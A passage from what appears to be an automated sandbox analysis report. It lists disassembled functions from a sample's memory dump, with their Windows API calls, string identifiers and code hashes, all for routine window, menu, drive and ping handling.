                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ColorLongWindow
                                            • String ID:
                                            • API String ID: 259745315-0
                                            • Opcode ID: d5161c90268dbe1c29eb8399011ffd7ec46a813caf2ead5efa06135a1bc7e60c
                                            • Instruction ID: 0729537b39e702f6b522b552416a7bc55abf0ee06a00980026ce195c1bfc405b
                                            • Opcode Fuzzy Hash: d5161c90268dbe1c29eb8399011ffd7ec46a813caf2ead5efa06135a1bc7e60c
                                            • Instruction Fuzzy Hash: 2341B1311011409FDB255F29EC48BFD3765EB06325F28526AFE65AB2F2C7318C92DB51
                                            Function 00E7AB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                            Download Yara Rule
                                            APIs
                                            • CharLowerBuffW.USER32(?,?,00E9F910), ref: 00E7AB76
                                            • GetDriveTypeW.KERNEL32(00000061,00ECA620,00000061), ref: 00E7AC40
                                            • _wcscpy.LIBCMT ref: 00E7AC6A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: BuffCharDriveLowerType_wcscpy
                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                            • API String ID: 2820617543-1000479233
                                            • Opcode ID: 9b479d9777a4b32b555306fc5eedfcb55f94b16c000214e683f94cdddf024eb0
                                            • Instruction ID: cc5c82b4f1272d7b88da317a875c73760977b34a209daf818a53ef59a9b13e0a
                                            • Opcode Fuzzy Hash: 9b479d9777a4b32b555306fc5eedfcb55f94b16c000214e683f94cdddf024eb0
                                            • Instruction Fuzzy Hash: F25181311083059BC710EF14C891AAEB7E5EFC4704F58A82DF59A772A2DB319D4ACA53
                                            Function 00E9C27C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 149windowCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E12612: GetWindowLongW.USER32(?,000000EB), ref: 00E12623
                                              • Part of subcall function 00E12344: GetCursorPos.USER32(?), ref: 00E12357
                                              • Part of subcall function 00E12344: ScreenToClient.USER32(00ED67B0,?), ref: 00E12374
                                              • Part of subcall function 00E12344: GetAsyncKeyState.USER32(00000001), ref: 00E12399
                                              • Part of subcall function 00E12344: GetAsyncKeyState.USER32(00000002), ref: 00E123A7
                                            • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00E9C2E4
                                            • ImageList_EndDrag.COMCTL32 ref: 00E9C2EA
                                            • ReleaseCapture.USER32 ref: 00E9C2F0
                                            • SetWindowTextW.USER32(?,00000000), ref: 00E9C39A
                                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00E9C3AD
                                            • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00E9C48F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID$pr$pr
                                            • API String ID: 1924731296-488423084
                                            • Opcode ID: 2827936a1c18b8d162a267496c9c4646671dc5185820bdbb8b351f282a4325cd
                                            • Instruction ID: a89839b83c8893ca65d3b2a858e2643a1be2d4a3ffe11800a2f10276228f7b3e
                                            • Opcode Fuzzy Hash: 2827936a1c18b8d162a267496c9c4646671dc5185820bdbb8b351f282a4325cd
                                            • Instruction Fuzzy Hash: 3A51CE74204304AFDB04EF20DC96FAA3BE5EF88314F10552EF595AB2E1DB309989DB52
                                            Function 00E19997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: __i64tow__itow__swprintf
                                            • String ID: %.15g$0x%p$False$True
                                            • API String ID: 421087845-2263619337
                                            • Opcode ID: e153a67846504fd8895d1777d91d8f160930cce20cf602c8acdf4f3c27f71ed1
                                            • Instruction ID: 29d58d9e588fa277ad69d1969ffcedd0a1b623cd83a08dc25b9dda1fb64283fe
                                            • Opcode Fuzzy Hash: e153a67846504fd8895d1777d91d8f160930cce20cf602c8acdf4f3c27f71ed1
                                            • Instruction Fuzzy Hash: D3412771604205AFDB24DF78DC46FB677E8EF84704F20686EE649F7292EA319881CB11
                                            Function 00E973C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • _memset.LIBCMT ref: 00E973D9
                                            • CreateMenu.USER32 ref: 00E973F4
                                            • SetMenu.USER32(?,00000000), ref: 00E97403
                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E97490
                                            • IsMenu.USER32(?), ref: 00E974A6
                                            • CreatePopupMenu.USER32 ref: 00E974B0
                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00E974DD
                                            • DrawMenuBar.USER32 ref: 00E974E5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                            • String ID: 0$F
                                            • API String ID: 176399719-3044882817
                                            • Opcode ID: f9b43928ff5f5300c81625270053908452e61cab0037b2749b51c2bd4b93558f
                                            • Instruction ID: d7746cbf89d8ece56881f9afbe5812f4ec9464e92be81a2514c2e8c0c5f5f8c7
                                            • Opcode Fuzzy Hash: f9b43928ff5f5300c81625270053908452e61cab0037b2749b51c2bd4b93558f
                                            • Instruction Fuzzy Hash: D5416578A01209EFDF20DF65D884A9ABBF9FF49305F14002AE9A5A7361D730AD18CB50
                                            Function 00E9772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00E977CD
                                            • CreateCompatibleDC.GDI32(00000000), ref: 00E977D4
                                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00E977E7
                                            • SelectObject.GDI32(00000000,00000000), ref: 00E977EF
                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 00E977FA
                                            • DeleteDC.GDI32(00000000), ref: 00E97803
                                            • GetWindowLongW.USER32(?,000000EC), ref: 00E9780D
                                            • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00E97821
                                            • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00E9782D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                            • String ID: static
                                            • API String ID: 2559357485-2160076837
                                            • Opcode ID: 4d61c4107b5e8bfa17042da99456dd5e0247b6698f45278b194c8728ab023090
                                            • Instruction ID: 3bb3882332c2b57b86a3abb6c829209a39e190550bc588a89dcf837fddbafc6c
                                            • Opcode Fuzzy Hash: 4d61c4107b5e8bfa17042da99456dd5e0247b6698f45278b194c8728ab023090
                                            • Instruction Fuzzy Hash: D931AA72111215BFDF219FA5DC08FDA3B69EF09325F100226FA55F20A0C731D825DBA0
                                            Function 00E37040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                            Download Yara Rule
                                            APIs
                                            • _memset.LIBCMT ref: 00E3707B
                                              • Part of subcall function 00E38D68: __getptd_noexit.LIBCMT ref: 00E38D68
                                            • __gmtime64_s.LIBCMT ref: 00E37114
                                            • __gmtime64_s.LIBCMT ref: 00E3714A
                                            • __gmtime64_s.LIBCMT ref: 00E37167
                                            • __allrem.LIBCMT ref: 00E371BD
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E371D9
                                            • __allrem.LIBCMT ref: 00E371F0
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E3720E
                                            • __allrem.LIBCMT ref: 00E37225
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E37243
                                            • __invoke_watson.LIBCMT ref: 00E372B4
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                            • String ID:
                                            • API String ID: 384356119-0
                                            • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                            • Instruction ID: 2864e30f306e40e5654f9def76df3480c304d67fc459a74bb95e18d8f145c202
                                            • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                            • Instruction Fuzzy Hash: 0C71F8F2A08706ABD7249E79CC85B5BBBE8AF11324F14522AF854F76D1E770D900CB90
                                            Function 00E72A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                            Download Yara Rule
                                            APIs
                                            • _memset.LIBCMT ref: 00E72A31
                                            • GetMenuItemInfoW.USER32(00ED6890,000000FF,00000000,00000030), ref: 00E72A92
                                            • SetMenuItemInfoW.USER32(00ED6890,00000004,00000000,00000030), ref: 00E72AC8
                                            • Sleep.KERNEL32(000001F4), ref: 00E72ADA
                                            • GetMenuItemCount.USER32(?), ref: 00E72B1E
                                            • GetMenuItemID.USER32(?,00000000), ref: 00E72B3A
                                            • GetMenuItemID.USER32(?,-00000001), ref: 00E72B64
                                            • GetMenuItemID.USER32(?,?), ref: 00E72BA9
                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E72BEF
                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E72C03
                                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E72C24
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                            • String ID:
                                            • API String ID: 4176008265-0
                                            • Opcode ID: 362f28cbfc93cd30e65ad595f61a2e2d7a985a984f32f364e43dc4c3daba830e
                                            • Instruction ID: 976cab581b8f8a1ac1c32aaf63cf04cbe48985677685039965d8d3599f2e5552
                                            • Opcode Fuzzy Hash: 362f28cbfc93cd30e65ad595f61a2e2d7a985a984f32f364e43dc4c3daba830e
                                            • Instruction Fuzzy Hash: 0461BFB0900249AFDB21CF64DC88EBEBBB8EB41308F14955EEA45B7251D731AD49DB21
                                            Function 00E97192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00E97214
                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00E97217
                                            • GetWindowLongW.USER32(?,000000F0), ref: 00E9723B
                                            • _memset.LIBCMT ref: 00E9724C
                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E9725E
                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00E972D6
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessageSend$LongWindow_memset
                                            • String ID:
                                            • API String ID: 830647256-0
                                            • Opcode ID: 6f0e1f65a951bf6361573bf6420bd398255f2f20d6aa6d468e30951fd2ee5dfe
                                            • Instruction ID: aff5c920b1efcf2973a9addc3bfe4aa676df62ed443d55d0691d85aee93af6b6
                                            • Opcode Fuzzy Hash: 6f0e1f65a951bf6361573bf6420bd398255f2f20d6aa6d468e30951fd2ee5dfe
                                            • Instruction Fuzzy Hash: A8615975A00208AFDB10DFA4CD81EEE77F8EB09714F14416AFA54B72A1D770AD49DBA0
                                            Function 00E6710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00E67135
                                            • SafeArrayAllocData.OLEAUT32(?), ref: 00E6718E
                                            • VariantInit.OLEAUT32(?), ref: 00E671A0
                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 00E671C0
                                            • VariantCopy.OLEAUT32(?,?), ref: 00E67213
                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 00E67227
                                            • VariantClear.OLEAUT32(?), ref: 00E6723C
                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 00E67249
                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E67252
                                            • VariantClear.OLEAUT32(?), ref: 00E67264
                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E6726F
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                            • String ID:
                                            • API String ID: 2706829360-0
                                            • Opcode ID: f850e6c8bd898fe9cbf8c5006c69bdad6a699afd54854321a41f5a2b5cd726fe
                                            • Instruction ID: c66beb074d30f7cc16739a43f1311bf827c899f8c80a75976b8393fdd03fa6d6
                                            • Opcode Fuzzy Hash: f850e6c8bd898fe9cbf8c5006c69bdad6a699afd54854321a41f5a2b5cd726fe
                                            • Instruction Fuzzy Hash: ED416071A40219AFCF00DF65D8589EEBBB9FF48354F00906AF955F7261CB30A949CB90
                                            Function 00E85A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • WSAStartup.WSOCK32(00000101,?), ref: 00E85AA6
                                            • inet_addr.WSOCK32(?,?,?), ref: 00E85AEB
                                            • gethostbyname.WSOCK32(?), ref: 00E85AF7
                                            • IcmpCreateFile.IPHLPAPI ref: 00E85B05
                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00E85B75
                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00E85B8B
                                            • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00E85C00
                                            • WSACleanup.WSOCK32 ref: 00E85C06
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                            • String ID: Ping
                                            • API String ID: 1028309954-2246546115
                                            • Opcode ID: 9f9da6b19b9a98e5341b0523b3f1128afab3300780302347dd1e9bf8a6b69508
                                            • Instruction ID: a1d164818813d9336f2ae2324378f17e6dd6c24d0224e557b89e1c0eb152627c
                                            • Opcode Fuzzy Hash: 9f9da6b19b9a98e5341b0523b3f1128afab3300780302347dd1e9bf8a6b69508
                                            • Instruction Fuzzy Hash: 7B517C326047009FDB20AF25DC85B6ABBE4EF48714F14996AF55EFB2A1DB70EC448B41
                                            Function 00E7B72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetErrorMode.KERNEL32(00000001), ref: 00E7B73B
                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00E7B7B1
                                            • GetLastError.KERNEL32 ref: 00E7B7BB
                                            • SetErrorMode.KERNEL32(00000000,READY), ref: 00E7B828
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Error$Mode$DiskFreeLastSpace
                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                            • API String ID: 4194297153-14809454
                                            • Opcode ID: 472bdc384c247f8c798612457274f9c4cc97ec31db33b2c317edb525c6f79a70
                                            • Instruction ID: 84355556dc86fb578d392f9f7023a454a6b3a6c16bd851521f873422041a8307
                                            • Opcode Fuzzy Hash: 472bdc384c247f8c798612457274f9c4cc97ec31db33b2c317edb525c6f79a70
                                            • Instruction Fuzzy Hash: 63317E35A00209AFDB08EF64D889FFE77B8EF84704F14912AE50AF7292DB719946C751
                                            Function 00E69471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E17F41: _memmove.LIBCMT ref: 00E17F82
                                              • Part of subcall function 00E6B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E6B0E7
                                            • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00E694F6
                                            • GetDlgCtrlID.USER32 ref: 00E69501
                                            • GetParent.USER32 ref: 00E6951D
                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E69520
                                            • GetDlgCtrlID.USER32(?), ref: 00E69529
                                            • GetParent.USER32(?), ref: 00E69545
                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 00E69548
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                            • String ID: ComboBox$ListBox
                                            • API String ID: 1536045017-1403004172
                                            • Opcode ID: 405e941e0ff518216727cd11aa8abd927bbe96f27f2ab4f135f76df741d07be0
                                            • Instruction ID: fb35080617dfc017b924c5f303f17781b94ce51ecaf32fe4c56a0e275052d131
                                            • Opcode Fuzzy Hash: 405e941e0ff518216727cd11aa8abd927bbe96f27f2ab4f135f76df741d07be0
                                            • Instruction Fuzzy Hash: C821E270A40204BFCF00AB61DC85EFEBBB8EF49300F10111AF562A72A3DB7559599A60
                                            Function 00E6955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E17F41: _memmove.LIBCMT ref: 00E17F82
                                              • Part of subcall function 00E6B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E6B0E7
                                            • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00E695DF
                                            • GetDlgCtrlID.USER32 ref: 00E695EA
                                            • GetParent.USER32 ref: 00E69606
                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E69609
                                            • GetDlgCtrlID.USER32(?), ref: 00E69612
                                            • GetParent.USER32(?), ref: 00E6962E
                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 00E69631
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                            • String ID: ComboBox$ListBox
                                            • API String ID: 1536045017-1403004172
                                            • Opcode ID: 69e8c6861a7492128afb562c55778dfcfc6820e5951c814c3479e8b49071676a
                                            • Instruction ID: 41219290a87109ea6c44b6ba1d2d46d55021482f03547bb57fe048949cd71c27
                                            • Opcode Fuzzy Hash: 69e8c6861a7492128afb562c55778dfcfc6820e5951c814c3479e8b49071676a
                                            • Instruction Fuzzy Hash: 1C21F271A40204BFDF00AB61CC85EFEBBB8EF58300F101016F962B72A2DB759959DB60
                                            Function 00E69645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetParent.USER32 ref: 00E69651
